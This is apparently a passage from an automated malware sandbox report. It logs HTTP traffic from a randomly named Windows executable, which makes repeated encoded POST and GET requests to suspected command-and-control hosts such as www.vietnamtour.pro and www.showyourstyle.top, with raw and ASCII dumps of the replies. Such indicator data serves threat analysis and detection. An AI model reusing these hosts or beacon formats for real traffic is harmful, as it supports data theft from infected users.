                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhmK1dnqVnfyq5aJbyYsza9fBEJpRFIBmXHgxQeOs8dqAZmfYb0cnS8dnevgd9h0l%2FEZuPM5Dc%2BwWRJ4qzyOqGzqP2XjGs0Wyfq38UiEEmatRyfc%2FHpqM%2Ff2iUVpS4bAdCfkyBx8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003756259cac340-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=750&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d aa 1c 38 ac 2c 41 93 8a 4a a1 44 90 1c 38 ba 78 91 23 b5 71 b0 37 8d f8 7b d4 54 48 5c 67 de 8c 66 e8 a6 7c dd b4 1f 4d 05 cf ed 4b 0d 4d f7 54 ef 36 b0 ba 47 dc 55 ed 16 b1 6c cb ab b3 d6 19 62 b5 5f 19 45 5e 4e 47 43 9e ad 33 8a a4 97 23 9b 22 2b 60 1f 04 b6 61 1a 1c e1 55 54 84 0b 44 87 e0 7e 2e b9 dc fc 63 7c 6e 14 8d a6 f5 0c 91 bf 27 4e c2 0e ba b7 1a 66 9b 60 08 02 5f 17 0e c2 00 e2 fb 04 89 e3 99 a3 26 1c 2f 4d d1 28 b2 ce 45 4e c9 3c 8e f6 d3 33 ae 75 a1 8b 1c 6e bb c3 34 c8 74 07 ef 4b 00 ac c0 3c cf fa dc b3 0c f6 24 61 8a 7a 8c 01 9a 10 05 1e 32 c2 bf 16 45 b8 cc 24 5c ee fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 7f e4 63 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e5LN0D'8M8,AJD8x#q7{TH\gf|MKMT6GUlb_E^NGC3#"+`aUTD~.c|n'Nf`_&/M(EN<3un4tK<$az2E$\bYc0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749975104.21.54.126803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:24.126991034 CET770OUTPOST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 4d 4d 70 39 75 46 55 72 68 57 67 43 6e 4a 4b 74 78 56 53 62 35 43 78 2f 38 6a 31 7a 59 75 51 55 43 57 4d 48 7a 59 61 46 62 57 35 2f 30 65 52 69 58 65 57 42 49 52 6e 78 50 35 4d 49 62 38 39 51 2b 56 31 48 49 73 33 50 42 72 6b 44 53 6b 46 53 34 58 63 38 4a 64 55 33 32 62 71 4c 70 4b 6a 71 75 56 63 2f 7a 77 56 34 62 48 49 78 38 2b 4a 35 72 4a 37 38 45 6b 4d 6c 54 53 4c 55 2b 42 43 69 39 5a 49 2b 56 48 49 72 5a 55 79 79 70 71 57 32 66 44 6a 32 6d 4b 4c 6e 70 65 33 64 30 6c 4f 4a 36 32 73 56 45 6c 4d 74 51 33 68 44 74 72 65 32 4c 6f 68 61 32 35 4e 77 4b 42 6f 7a 49 3d
                                                                Data Ascii: UfjxuDP=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMMMp9uFUrhWgCnJKtxVSb5Cx/8j1zYuQUCWMHzYaFbW5/0eRiXeWBIRnxP5MIb89Q+V1HIs3PBrkDSkFS4Xc8JdU32bqLpKjquVc/zwV4bHIx8+J5rJ78EkMlTSLU+BCi9ZI+VHIrZUyypqW2fDj2mKLnpe3d0lOJ62sVElMtQ3hDtre2Loha25NwKBozI=
                                                                Jan 11, 2025 09:15:25.062391043 CET1077INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:25 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2B%2BsNP4R2rXPPTih9atHetgOyZEeLPpa4h2uXX%2Fz%2BB65laYJjzA2DLGRl1WU%2Ffnhl78pBAyn%2BcV7uAfMkz2sks%2FH%2B8abK9WlQZTxgUmq8lbafe6h%2FB1ILkfvlXNKDDi20cgomD3G"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 900375724bb77d0c-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d aa 1c 38 ac 2c 41 93 8a 4a a1 44 90 1c 38 ba 78 91 23 b5 71 b0 37 8d f8 7b d4 54 48 5c 67 de 8c 66 e8 a6 7c dd b4 1f 4d 05 cf ed 4b 0d 4d f7 54 ef 36 b0 ba 47 dc 55 ed 16 b1 6c cb ab b3 d6 19 62 b5 5f 19 45 5e 4e 47 43 9e ad 33 8a a4 97 23 9b 22 2b 60 1f 04 b6 61 1a 1c e1 55 54 84 0b 44 87 e0 7e 2e b9 dc fc 63 7c 6e 14 8d a6 f5 0c 91 bf 27 4e c2 0e ba b7 1a 66 9b 60 08 02 5f 17 0e c2 00 e2 fb 04 89 e3 99 a3 26 1c 2f 4d d1 28 b2 ce 45 4e c9 3c 8e f6 d3 33 ae 75 a1 8b 1c 6e bb c3 34 c8 74 07 ef 4b 00 ac c0 3c cf fa dc b3 0c f6 24 61 8a 7a 8c 01 9a 10 05 1e 32 c2 bf 16 45 b8 cc 24 5c ee fd 02 00 00 ff ff e3 02 00 59 7f e4 63 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: f0LN0D'8M8,AJD8x#q7{TH\gf|MKMT6GUlb_E^NGC3#"+`aUTD~.c|n'Nf`_&/M(EN<3un4tK<$az2E$\Yc0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749976104.21.54.126803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:26.762778997 CET1783OUTPOST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 45 4d 70 75 6d 46 56 49 5a 57 68 43 6e 4a 57 64 78 55 53 62 35 66 78 2f 6b 76 31 7a 46 5a 51 53 47 57 4d 68 6e 59 54 58 7a 57 67 50 30 65 4d 79 58 66 62 68 49 45 6e 78 65 77 4d 49 4c 38 39 51 2b 56 31 46 51 73 77 65 42 72 6d 44 53 6c 54 43 34 62 4c 4d 4a 31 55 7a 61 68 71 4c 6b 78 6a 61 4f 56 63 66 6a 77 47 2b 50 48 4a 52 38 38 49 35 71 61 37 39 34 33 4d 6c 66 65 4c 55 62 71 43 6c 78 5a 4b 37 67 4b 54 34 4a 69 6f 55 78 4b 49 58 54 75 72 48 50 38 4c 6c 30 39 39 74 63 48 4e 65 6d 6f 6f 44 4d 53 4e 62 5a 30 38 67 38 59 52 53 44 59 6c 64 2f 4c 51 6a 61 6a 78 45 37 38 71 39 2f 5a 44 66 46 46 71 79 4f 69 77 76 74 35 36 50 68 76 4f 54 4a 69 68 46 52 51 2f 48 6f 54 64 4b 51 6e 4a 4c 66 4b 6d 4f 34 39 42 76 44 50 4c 32 53 36 34 53 47 52 59 42 34 6e 64 35 36 67 33 4b 78 42 4f 57 75 36 57 59 4a 6b 7a 76 35 33 51 4d 39 6d 53 58 56 52 6f 2b 49 31 59 47 49 77 38 6c [TRUNCATED]
                                                                Data Ascii: UfjxuDP=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMEMpumFVIZWhCnJWdxUSb5fx/kv1zFZQSGWMhnYTXzWgP0eMyXfbhIEnxewMIL89Q+V1FQsweBrmDSlTC4bLMJ1UzahqLkxjaOVcfjwG+PHJR88I5qa7943MlfeLUbqClxZK7gKT4JioUxKIXTurHP8Ll099tcHNemooDMSNbZ08g8YRSDYld/LQjajxE78q9/ZDfFFqyOiwvt56PhvOTJihFRQ/HoTdKQnJLfKmO49BvDPL2S64SGRYB4nd56g3KxBOWu6WYJkzv53QM9mSXVRo+I1YGIw8loZMzFzvLOSYkntq3Pd/L8cf36ovY9qYryC5yCLqUQmzFNo7k6dMxiPQI9Y8LVHXlIY7Pgt/C8dLcH5zAg7HmaVoJ9L0YYEPfuw/rEXHc7FdUSYJjkd0IGAN0+5Ij7aqgRcYzDmTzkTzaTQSViLVd6DpnZ6rVe9TwBXm2xenlEChQwk2kShaPCp1DJ1m2b1JX/DlfRJwYQ4e+QlDC6E/ubop34D5tWgQUEbyrdwttoCI9F2PWj/JFa29Rj6zRduX2Umcuq5/8a9PvLBbHcZRD5+xoMUmuVJmoO6VyVvXyqH1HhbTZml+1GHUU18K/fplw+JUZSCLfxaWVvzoTTtWUQsncqVxJDGYrpd9Rl3Fx1c//CDGX90eQP2rIZ5lYf/TaYaQa9kA5U+xFqrm+m8gaTFED/KxM9fXdaNdexoGHD3418rBcrdqU+2hsFKIH5GebyBMuCLeqPPYuwYj742tNg46PKLQokChGwKY5bTH3XIcJSPTLGFalIzkK9Pq1y34mDynCp0SnpAh1wP02jEZEu8GzLneEiJRrRzEHOwr9yosszxLDr+9P/9nQGH2ToXEAFqMtdidGUX3/aDZEk+3YaXNHPybrV9/ZKVCrpkQCMnA9ELoH2L+2e6GWNay+wyqiMVhC9l/uclPqlIDXsik/IBvD0iOcqGrohL [TRUNCATED]
                                                                Jan 11, 2025 09:15:27.724517107 CET1078INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:27 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt6%2BNoCY9U9KgyiTT1zFjUOofyHBp9vV3hQ6MQIlrWuuKkS%2FcVbw6YziiIeZuv5dSdpAx0V%2BIsF%2BzujYeaqfipiZHCVnSgvUka2HDBqcm%2FeOWGrmfI6IcrIPo8Fau94mWfia7Q%2BD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90037582be338c11-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d aa 1c 38 ac 2c 41 93 8a 4a a1 44 90 1c 38 ba 78 91 23 b5 71 b0 37 8d f8 7b d4 54 48 5c 67 de 8c 66 e8 a6 7c dd b4 1f 4d 05 cf ed 4b 0d 4d f7 54 ef 36 b0 ba 47 dc 55 ed 16 b1 6c cb ab b3 d6 19 62 b5 5f 19 45 5e 4e 47 43 9e ad 33 8a a4 97 23 9b 22 2b 60 1f 04 b6 61 1a 1c e1 55 54 84 0b 44 87 e0 7e 2e b9 dc fc 63 7c 6e 14 8d a6 f5 0c 91 bf 27 4e c2 0e ba b7 1a 66 9b 60 08 02 5f 17 0e c2 00 e2 fb 04 89 e3 99 a3 26 1c 2f 4d d1 28 b2 ce 45 4e c9 3c 8e f6 d3 33 ae 75 a1 8b 1c 6e bb c3 34 c8 74 07 ef 4b 00 ac c0 3c cf fa dc b3 0c f6 24 61 8a 7a 8c 01 9a 10 05 1e 32 c2 bf 16 45 b8 cc 24 5c ee fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 7f e4 63 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e5LN0D'8M8,AJD8x#q7{TH\gf|MKMT6GUlb_E^NGC3#"+`aUTD~.c|n'Nf`_&/M(EN<3un4tK<$az2E$\bYc0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.749977104.21.54.126803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:29.307890892 CET490OUTGET /wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:30.354145050 CET1081INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:30 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5Ag3I6hRcgGnCeekoCmTi1rzssAshuX5EPjkVArFLfYIBkG5s0TcstoxpPDHypKtTby9HKPMeqkovTfwo%2BVrT4x3F9txp9%2FUPiRPT6GVgzmsCEohSOns1F6x7Tb4TcBndNAAGvI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 90037592c9047cb4-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=490&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 76 69 65 74 6e 61 6d 74 6f 75 72 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.vietnamtour.pro Port 80</address></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.74997869.57.163.64803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:36.197618008 CET756OUTPOST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 76 72 67 58 6f 68 4e 72 59 31 38 46 42 54 7a 58 77 61 57 34 73 79 71 63 78 2b 6a 70 59 56 32 4c 46 62 30 74 59 72 4f 66 76 77 7a 6a 62 41 54 72 36 61 66 39 64 4b 63 63 49 4e 54 6f 38 59 65 70 38 68 78 56 47 42 48 75 67 35 55 79 4b 39 47 41 41 6f 65 49 36 4c 50 32 34 42 6a 45 53 68 65 58 47 6f 74 52 62 61 36 31 56 56 4e 67 4d 66 50 6d 51 67 58 32 34 4a 76 4a 4d 62 68 56 46 36 68 38 39 37 2b 32 6b 32 61 69 75 4e 33 53 7a 76 61 35 62 52 62 6f 54 70 75 4f 79 41 56 74 4e 35 58 48 36 47 6d 76 6f 4a 4f 74 43 6e 4e 63 6e 42 41 47 4b 33 6e 47 44 38 65 50 4c 73 79 73 71 53 4a 37 4b 32 39 38 67 3d 3d
                                                                Data Ascii: UfjxuDP=YJXb98DVW6x1mvrgXohNrY18FBTzXwaW4syqcx+jpYV2LFb0tYrOfvwzjbATr6af9dKccINTo8Yep8hxVGBHug5UyK9GAAoeI6LP24BjESheXGotRba61VVNgMfPmQgX24JvJMbhVF6h897+2k2aiuN3Szva5bRboTpuOyAVtN5XH6GmvoJOtCnNcnBAGK3nGD8ePLsysqSJ7K298g==
                                                                Jan 11, 2025 09:15:36.803406954 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:36 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.74997969.57.163.64803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:38.751606941 CET776OUTPOST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 68 32 4c 6b 4c 30 75 5a 72 4f 50 2f 77 7a 33 4c 41 57 6f 4b 61 75 39 64 32 55 63 4d 52 54 6f 38 63 65 70 34 6c 78 56 58 42 45 38 41 35 57 6e 61 38 67 66 51 6f 65 49 36 4c 50 32 34 6b 4f 45 53 35 65 58 79 55 74 52 36 61 35 38 31 56 43 6e 4d 66 50 33 41 67 4d 32 34 4a 4e 4a 4e 57 70 56 47 53 68 38 38 4c 2b 32 78 61 5a 33 2b 4e 39 57 7a 75 64 77 49 6b 45 6e 41 4d 51 47 67 4e 50 79 2b 6b 7a 47 4d 48 45 31 4b 46 69 7a 54 66 32 59 6c 6c 32 52 73 71 53 45 43 34 47 43 70 59 54 7a 64 33 6a 32 59 58 35 71 56 64 55 73 67 57 62 6b 69 33 37 4c 74 6d 57 77 62 6e 74 38 66 55 3d
                                                                Data Ascii: UfjxuDP=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqqh2LkL0uZrOP/wz3LAWoKau9d2UcMRTo8cep4lxVXBE8A5Wna8gfQoeI6LP24kOES5eXyUtR6a581VCnMfP3AgM24JNJNWpVGSh88L+2xaZ3+N9WzudwIkEnAMQGgNPy+kzGMHE1KFizTf2Yll2RsqSEC4GCpYTzd3j2YX5qVdUsgWbki37LtmWwbnt8fU=
                                                                Jan 11, 2025 09:15:39.336935043 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:39 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.74998069.57.163.64803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:41.297291994 CET1789OUTPOST /zbqa/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.showyourstyle.top
                                                                Origin: http://www.showyourstyle.top
                                                                Referer: http://www.showyourstyle.top/zbqa/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
